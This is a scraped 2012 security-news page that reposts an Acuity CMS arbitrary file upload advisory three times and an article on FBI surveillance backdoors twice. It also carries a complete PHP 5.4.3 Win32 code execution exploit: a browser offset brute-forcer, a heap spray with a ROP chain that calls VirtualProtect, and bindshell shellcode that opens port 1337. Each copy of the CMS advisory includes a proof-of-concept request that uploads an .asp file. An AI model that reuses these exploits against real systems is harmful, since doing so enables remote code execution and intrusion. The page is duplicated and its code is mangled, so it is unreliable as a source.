News

Acuity CMS 2.6.x (ASP-based) Arbitrary File Upload

22 May 12 by IDGLabs.NET in News

Topic:
Acuity CMS 2.6.x (ASP-based) Arbitrary File Upload
Credit:
Aung Khant
Date:
2012.05.20
CWE:
N/A
CVE:
N/A

1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload.

2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.

3. VULNERABILITY DESCRIPTION

Acuity CMS 2.6.x (ASP-based) version contain a flaw that may allow an
attacker to upload .asp/.aspx files without restrictions, which will
execute ASP(.Net) codes. The issue is due to the script,
/admin/file_manager/file_upload_submit.asp , not properly sanitizing
‘file1′, ‘file2′, ‘file3′, ‘fileX’ parameters.

4. VERSIONS AFFECTED

Tested with version 2.6.2.

5. PROOF-OF-CONCEPT/EXPLOIT

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX

—————————–6dc3a236402e2
Content-Disposition: form-data; name=”path”

/images
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”rootpath”

/
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”rootdisplay”

http://localhost/
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”status”

confirmed
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”action”

fileUpload
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”file1″; filename=”0wned.asp”
Content-Type: application/octet-stream

% response.write(“0wned!”) %

—————————–6dc3a236402e2–

[/REQUEST]

6. SOLUTION

The Acunity CMS is no longer in active development.
It is recommended to user another CMS in active development and support.

7. VENDOR

The Collective

http://www.thecollective.com.au/

8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed

10. REFERENCES

Original Advisory URL:

http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload

#yehg [2012-05-20]

References:

[ ASCII VERSION ]

Contact Us for more informations.
Want a FREE No Obligation Price Quote?

GHTime Code(s): nc

Return to top

New FBI Surveillance Backdoors? 6 Key Points

21 May 12 by IDGLabs.NET in News

(click image for larger view and for slideshow)

Will Congress require social networks, online voice over IP (VoIP) services, and Webmail providers to build in backdoors that could be used for electronic surveillance purposes by the FBI?

According to one news report, FBI officials have been meeting with Facebook, Google, Microsoft (which owns Skype and Hotmail), and Yahoo, among other companies. The goal apparently isn’t to promote the bureau’s push for expanded wiretapping capabilities, but rather to ask how that be implemented while causing minimal disruption for the companies with networks that would be directly accessed.

Reached by phone, an FBI spokesman declined to confirm or deny the news report. But it wouldn’t be the first time in recent history in which the FBI has detailed the difficulties it faces when attempting to “wiretap” newer types of communication–from Facebook and Twitter to Skype and X-Box VoIP–and argued for greater capabilities.

[ Cybersecurity heads the list of federal CIO worries. Read more at Security Top Concern Of Federal CIOs. ]

Here are 6 points to consider about expanding the FBI’s surveillance powers:

1. Bureau Warns About Going Dark.
The bureau has already been asking Congress for broader surveillance powers to help it keep up with new technologies. Notably, FBI director Robert S. Mueller III told Congress in December 2011 that “a growing gap exists between the statutory authority of law enforcement to intercept electronic communications pursuant to court order and our practical ability to intercept those communications.” The consequences, he warned, could be dire. “Should this gap continue to grow, there is a very real risk of the government ‘going dark,’ resulting in an increased risk to national security and public safety.”

2. Proposed CALEA Revisions Would Update 1994 Law.
Accordingly, the FBI wants Congress to expand the Communications Assistance for Law Enforcement Act (CALEA). First passed in 1994, the purpose of the law–according to its text–is “to make clear a telecommunications carrier’s duty to cooperate in the interception of communications for Law Enforcement purposes, and for other purposes.” Specifically, the law is designed to allow law enforcement agencies, with a warrant, to conduct wiretaps of digital telephone networks. The law also made telephone carriers responsible for CALEA development and implementation costs. Congress then expanded the law in 2004 to cover broadband Internet service providers (ISPs) as well as telecommunications carriers that handle voice communications via VoIP.

But the latest proposed expansion could see the Federal Communications Commission review whether CALEA should be used to require services such as Skype, the PlayStation Network, Gmail, and similar services to make their systems easier to wiretap. CALEA requires that any encryption added by the wiretapped service be removed for law enforcement access.

3. Questions Remain Over Wiretapping Scope.
Just how often does the FBI need to use wiretapping during an investigation? That’s not clear. According to an FBI website about CALEA, wiretapping “is used infrequently and then only to combat the most serious crimes and terrorism.” It also says that law enforcement officers must “establish probable cause that the wiretaps may provide evidence of a felony violation of federal law,” after which it’s up to a judge to approve or disprove the wiretap, and then monitor any wiretapping.

4. Civil Liberties Groups See Slippery Slope.
Civil rights groups have warned that granting law enforcement agencies new surveillance powers could lead to a decrease in the privacy protections that people currently enjoy. “The heart of the issue is a growing attitude among law enforcement that there ought to be a presumption that citizens’ communications be susceptible to eavesdropping. There is no reason for such a presumption,” Jay Stanley, senior policy analyst for the Speech, Privacy and Technology Project at the American Civil Liberties Union, wrote in a blog post.

5. Will Technology Companies Back CALEA Expansion?
FBI overtures to technology giants aside, it’s far from clear whether Facebook, Google, Microsoft, and their ilk would back the proposed CALEA changes and grant the FBI direct access their networks. In fact, they could try to torpedo such proposals, not least to distance themselves from anything involving surreptitious access to user data.

In fact, Twitter last month filed a motion in a New York state court to quash a New York City prosecutor’s request for information pertaining to Twitter user Malcolm Harris, who participated in Occupy Wall Street protests on the Brooklyn Bridge last year. Harris had already failed to quash the subpoena after a court ruled that his posts belonged not to him but to Twitter, meaning he had no legal standing to challenge the subpoena.

Interestingly, Twitter’s motion to quash instead argues that the subpoena imposes an overwhelming burden because it doesn’t give the Twitter user the ability to argue against the subpoena. Furthermore, Twitter said that its terms of service explicitly tell users that they “retain [their] rights to any Content [they] submit, post or display on or through” the service, and notes that relevant legislation allows users to challenge any demands for their account records. “To hold otherwise imposes a new and overwhelming burden on Twitter to fight for its users’ rights, since the [court order] deprives its users of the ability to fight for their own rights when faced with a subpoena from New York State,” read Twitter’s legal filing.

6. Backdoors May Facilitate Unauthorized Access.
Wiretapping backdoors could also make online services more vulnerable to attackers. In particular, adding hard-coded backdoors or access credentials for any website, application, or service is a cause for concern since this access could be abused in unintended–and potentially untraceable–ways. “Companies are also afraid of the potential security threat to trade secrets and confidential exchanges,” wrote attorney Aaron Kelly, who specializes in online privacy laws, in a blog post. “Some of them argue that a sufficiently skilled hacker could break in through a backdoor and steal personal information from a business.”

Hacktivist and cybercriminal threats concern IT teams most, our first Federal Government Cybersecurity Survey reveals. Here’s how they’re fighting back. Also in the new, all-digital Top Federal IT Threats issue of InformationWeek Government: Why federal efforts to cut IT costs don’t go far enough, and how the State Department is enhancing security. (Free registration required.)

Contact Us for more informations.
Want a FREE No Obligation Price Quote?

GHTime Code(s): nc

Return to top

Acuity CMS 2.6.x (ASP-based) Arbitrary File Upload

21 May 12 by IDGLabs.NET in News

Topic:
Acuity CMS 2.6.x (ASP-based) Arbitrary File Upload
Credit:
Aung Khant
Date:
2012.05.20
CWE:
N/A
CVE:
N/A

1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload.

2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.

3. VULNERABILITY DESCRIPTION

Acuity CMS 2.6.x (ASP-based) version contain a flaw that may allow an
attacker to upload .asp/.aspx files without restrictions, which will
execute ASP(.Net) codes. The issue is due to the script,
/admin/file_manager/file_upload_submit.asp , not properly sanitizing
‘file1′, ‘file2′, ‘file3′, ‘fileX’ parameters.

4. VERSIONS AFFECTED

Tested with version 2.6.2.

5. PROOF-OF-CONCEPT/EXPLOIT

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX

—————————–6dc3a236402e2
Content-Disposition: form-data; name=”path”

/images
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”rootpath”

/
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”rootdisplay”

http://localhost/
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”status”

confirmed
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”action”

fileUpload
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”file1″; filename=”0wned.asp”
Content-Type: application/octet-stream

% response.write(“0wned!”) %

—————————–6dc3a236402e2–

[/REQUEST]

6. SOLUTION

The Acunity CMS is no longer in active development.
It is recommended to user another CMS in active development and support.

7. VENDOR

The Collective

http://www.thecollective.com.au/

8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed

10. REFERENCES

Original Advisory URL:

http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload

#yehg [2012-05-20]

References:

[ ASCII VERSION ]

Contact Us for more informations.
Want a FREE No Obligation Price Quote?

GHTime Code(s): nc

Return to top

Acuity CMS 2.6.x (ASP-based) Arbitrary File Upload

20 May 12 by IDGLabs.NET in News

Topic:
Acuity CMS 2.6.x (ASP-based) Arbitrary File Upload
Credit:
Aung Khant
Date:
2012.05.20
CWE:
N/A
CVE:
N/A

1. OVERVIEW

Acuity CMS 2.6.x (ASP-based) versions are vulnerable to Arbitrary File Upload.

2. BACKGROUND

Acuity CMS is a powerful but simple, extremely easy to use, low
priced, easy to deploy content management system. It is a leader in
its price and feature class.

3. VULNERABILITY DESCRIPTION

Acuity CMS 2.6.x (ASP-based) version contain a flaw that may allow an
attacker to upload .asp/.aspx files without restrictions, which will
execute ASP(.Net) codes. The issue is due to the script,
/admin/file_manager/file_upload_submit.asp , not properly sanitizing
‘file1′, ‘file2′, ‘file3′, ‘fileX’ parameters.

4. VERSIONS AFFECTED

Tested with version 2.6.2.

5. PROOF-OF-CONCEPT/EXPLOIT

[REQUEST]
POST /admin/file_manager/file_upload_submit.asp HTTP/1.1
Host: localhost
Cookie: ASPSESSIONID=XXXXXXXXXXXXXXX

—————————–6dc3a236402e2
Content-Disposition: form-data; name=”path”

/images
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”rootpath”

/
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”rootdisplay”

http://localhost/
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”status”

confirmed
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”action”

fileUpload
—————————–6dc3a236402e2
Content-Disposition: form-data; name=”file1″; filename=”0wned.asp”
Content-Type: application/octet-stream

% response.write(“0wned!”) %

—————————–6dc3a236402e2–

[/REQUEST]

6. SOLUTION

The Acunity CMS is no longer in active development.
It is recommended to user another CMS in active development and support.

7. VENDOR

The Collective

http://www.thecollective.com.au/

8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-05-20: vulnerability disclosed

10. REFERENCES

Original Advisory URL:

http://yehg.net/lab/pr0js/advisories/%5Bacuity_cms2.6%20x_(asp)%5D_arbitrary_fileupload

#yehg [2012-05-20]

References:

[ ASCII VERSION ]

Contact Us for more informations.
Want a FREE No Obligation Price Quote?

GHTime Code(s): nc

Return to top

PHP 5.4.3 Win32 Code Execution

20 May 12 by IDGLabs.NET in News

Topic:
PHP 5.4.3 Win32 Code Execution
Credit:
Maksymilian Motyl
Date:
2012.05.19
CWE:
CWE-119 (Show similar)
CVE:
N/A

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)
// Exploit author: 0in (Maksymilian Motyl)
// Email: 0in(dot)email(at)gmail.com
// * Bug with Variant type parsing originally discovered by Condis
// Tested on Windows XP SP3 fully patched (Polish)

===================
offset-brute.html
===================

htmlbody
title0day/title
center
font size=7PHP 5.4.3 0day by 0in cOndis/fontbr
textarea rows=50 cols=50 id=”log”lt;/textareagt;
/center
script
function sleep(milliseconds) {
var start = new Date().getTime();
for (var i = 0; i 1e7; i++) {
if ((new Date().getTime() – start) milliseconds){
break;
}
}
}
function makeRequest(url, parameters)
{
var xmlhttp = new XMLHttpRequest();
if (window.XMLHttpRequest) {
xmlhttp = new XMLHttpRequest();
if (xmlhttp.overrideMimeType) {
xmlhttp.overrideMimeType(‘text/xml’);
}
} else if (window.ActiveXObject) {
// IE
try { xmlhttp = new ActiveXObject(“Msxml2.XMLHTTP”); }
catch (e) {
try { xmlhttp = new ActiveXObject(“Microsoft.XMLHTTP”); }
catch (e) {}
}
}

if (!xmlhttp) {
alert(‘Giving up :( Cannot create an XMLHTTP instance’);
return false;
}

xmlhttp.open(“GET”,url,true);
xmlhttp.send(null);
return true;
}
test=document.getElementById(“log”);
for(offset=0;offset300;offset++)
{
log.value+=”Trying offset:”+offset+”rn”;
makeRequest(“0day.php?offset=”+offset);
sleep(500);
}

/script/body/html

===================
0day.php
===================

?php

$spray = str_repeat(“x90″,0×200);
$offset=$_GET['offset'];
// 775DF0Da # ADD ESP,10 # RETN ** [ole32.dll]
$spray = substr_replace($spray, “xdaxf0x5dx77″, (strlen($spray))*-1,(strlen($spray))*-1);
// : 0x048d0030
$spray = substr_replace($spray, pack(“L”,0x048d0030+$offset), (strlen($spray)-0×8)*-1,(strlen($spray))*-1);

//0x7752ae9f (RVA : 0x0005ae7f) : # XCHG EAX,ESP # MOV ECX,468B0000 # OR AL,3 # RETN [ole32.dll]
$spray = substr_replace($spray, “x9fxaex52x77″, (strlen($spray)-0×10)*-1,(strlen($spray))*-1);

// Adress of VirtualProtect 0x7c801ad4
$spray = substr_replace($spray, “xd4x1ax80x7c”, (strlen($spray)-0×14)*-1,(strlen($spray))*-1);

// LPVOID lpAddress = 0x048d0060
$spray = substr_replace($spray, pack(“L”,0x048d0060+$offset), (strlen($spray)-0x1c)*-1,(strlen($spray))*-1);

// SIZE_T dwSize = 0×01000000
$spray = substr_replace($spray, “x00x00x10x00″, (strlen($spray)-0×20)*-1,(strlen($spray))*-1);

// DWORD flNewProtect = PAGE_EXECUTE_READWRITE (0×00000040) | 0xffffffc0
$spray = substr_replace($spray, “x40x00x00x00″, (strlen($spray)-0×24)*-1,(strlen($spray))*-1);
// __out PDWORD lpflOldProtect = 0×04300070 | 0×105240000

// 0x048d0068
$spray = substr_replace($spray, pack(“L”,0x048d0068+$offset), (strlen($spray)-0×28)*-1,(strlen($spray))*-1);

//0x77dfe8b4 : # XOR EAX,EAX # ADD ESP,18 # INC EAX # POP EBP # RETN 0C ** [ADVAPI32.dll]
$spray = substr_replace($spray, “xb4xe8xdfx77″, (strlen($spray)-0×18)*-1,4);
// Ret Address = 0x048d0080
$spray = substr_replace($spray, pack(“L”,0x048d0080+$offset), (strlen($spray)-0×48)*-1,4);

$stacktrack = “xbcx0cxb0xc0x00″;
// Universal win32 bindshell on port 1337 from metasploit
$shellcode = $stacktrack.”x33xc9x83xe9xb0″.
“x81xc4xd0xfdxffxff”.
“xd9xeexd9x74x24xf4x5bx81x73x13x1d”.
“xccx32x69x83xebxfcxe2xf4xe1xa6xd9x24xf5x35xcdx96″.
“xe2xacxb9x05x39xe8xb9x2cx21x47x4ex6cx65xcdxddxe2″.
“x52xd4xb9x36x3dxcdxd9x20x96xf8xb9x68xf3xfdxf2xf0″.
“xb1x48xf2x1dx1ax0dxf8x64x1cx0exd9x9dx26x98x16x41″.
“x68x29xb9x36x39xcdxd9x0fx96xc0x79xe2x42xd0x33x82″.
“x1exe0xb9xe0x71xe8x2ex08xdexfdxe9x0dx96x8fx02xe2″.
“x5dxc0xb9x19x01x61xb9x29x15x92x5axe7x53xc2xdex39″.
“xe2x1ax54x3ax7bxa4x01x5bx75xbbx41x5bx42x98xcdxb9″.
“x75x07xdfx95x26x9cxcdxbfx42x45xd7x0fx9cx21x3ax6b”.
“x48xa6x30x96xcdxa4xebx60xe8x61x65x96xcbx9fx61x3a”.
“x4ex9fx71x3ax5ex9fxcdxb9x7bxa4x37x50x7bx9fxbbx88″.
“x88xa4x96x73x6dx0bx65x96xcbxa6x22x38x48x33xe2x01″.
“xb9x61x1cx80x4ax33xe4x3ax48x33xe2x01xf8x85xb4x20″.
“x4ax33xe4x39x49x98x67x96xcdx5fx5ax8ex64x0ax4bx3e”.
“xe2x1ax67x96xcdxaax58x0dx7bxa4x51x04x94x29x58x39″.
“x44xe5xfexe0xfaxa6x76xe0xffxfdxf2x9axb7x32x70x44″.
“xe3x8ex1exfax90xb6x0axc2xb6x67x5ax1bxe3x7fx24x96″.
“x68x88xcdxbfx46x9bx60x38x4cx9dx58x68x4cx9dx67x38″.
“xe2x1cx5axc4xc4xc9xfcx3axe2x1ax58x96xe2xfbxcdxb9″.
“x96x9bxcexeaxd9xa8xcdxbfx4fx33xe2x01xf2x02xd2x09″.
“x4ex33xe4x96xcdxccx32x69″;

$spray = substr_replace($spray,$shellcode, (strlen($spray)-0×50)*-1,(strlen($shellcode)));
$fullspray=”";
for($i=0;$i0x4b00;$i++)
{
$fullspray.=$spray;
}
$j=array();
$e=array();
$b=array();
$a=array();
$c=array();

array_push($j,$fullspray);
array_push($e,$fullspray.”W”);
array_push($b,$fullspray.”A”);
array_push($a,$fullspray.”S”);
array_push($c,$fullspray.”!”);

$vVar = new VARIANT(0x048d0038+$offset);
// Shoot him
com_print_typeinfo($vVar); //CRASH – 102F3986 FF50 10 CALL DWORD PTR DS:[EAX+10]

echo $arr;

echo $spray;

?

References:

[ ASCII VERSION ]

Contact Us for more informations.
Want a FREE No Obligation Price Quote?

GHTime Code(s): nc

Return to top

New FBI Surveillance Backdoors? 6 Key Points

19 May 12 by IDGLabs.NET in News

(click image for larger view and for slideshow)

Will Congress require social networks, online voice over IP (VoIP) services, and Webmail providers to build in backdoors that could be used for electronic surveillance purposes by the FBI?